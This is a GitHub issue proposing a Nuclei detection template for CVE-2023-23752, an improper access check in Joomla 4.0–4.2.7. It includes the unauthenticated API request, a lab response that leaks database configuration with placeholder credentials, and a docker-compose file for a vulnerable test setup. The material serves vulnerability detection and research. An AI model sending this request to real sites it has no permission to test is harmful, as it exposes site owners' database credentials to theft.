### ISSUE TITLE
CVE-2023-23752

### ISSUE THREAD

**Issue by rb-x** [projectdiscovery/nuclei-templates#6911]
### Template Information:

This is a template for detecting [CVE-2023-23752](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23752) affecting Joomla version 4.0 to 4.2.7 included.
In case of exposure, the backend returns a 200 response with a JSON response.

#### References

- https://xz.aliyun.com/t/12175 (Kyo Dream Writeup)

### Nuclei Template:

```yaml
id: CVE-2023-23752
info:
  name: Joomla Unauthorized API access
  author: br__
  severity: medium
  description: An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper
    access check allows unauthorized access to webservice endpoints.
  reference:
    - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-23752
  tags: cve,cve2023
requests:
  - raw:
      - |+
        GET /api/index.php/v1/config/application?public=true HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
        Connection: close

    matchers:
      - type: word
        part: body
        words:
          - '"links":{'
```

### HTTP response

```http
HTTP/1.1 200 OK
Date: Thu, 16 Mar 2023 21:35:34 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: JoomlaAPI/1.0
x-frame-options: SAMEORIGIN
referrer-policy: strict-origin-when-cross-origin
cross-origin-opener-policy: same-origin
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Thu, 16 Mar 2023 21:35:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1965
Connection: close
Content-Type: application/vnd.api+json; charset=utf-8

{"links":{"self":"http:\/\/me:8087\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/me:8087\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/me:8087\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.<br>Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"joomjoom","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"id":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"joomladb","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"example","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"h9opi_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}
```

###  Docker-compose

```yml
version: '3.1'

services:
  joomla:
    image: joomla:4.2.2-php8.0
    restart: always
    links:
      - joomladb:mysql
    ports:
      - 8087:80
    environment:
      JOOMLA_DB_HOST: joomladb
      JOOMLA_DB_PASSWORD: example

  joomladb:
    image: mysql:5.6
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: example
```
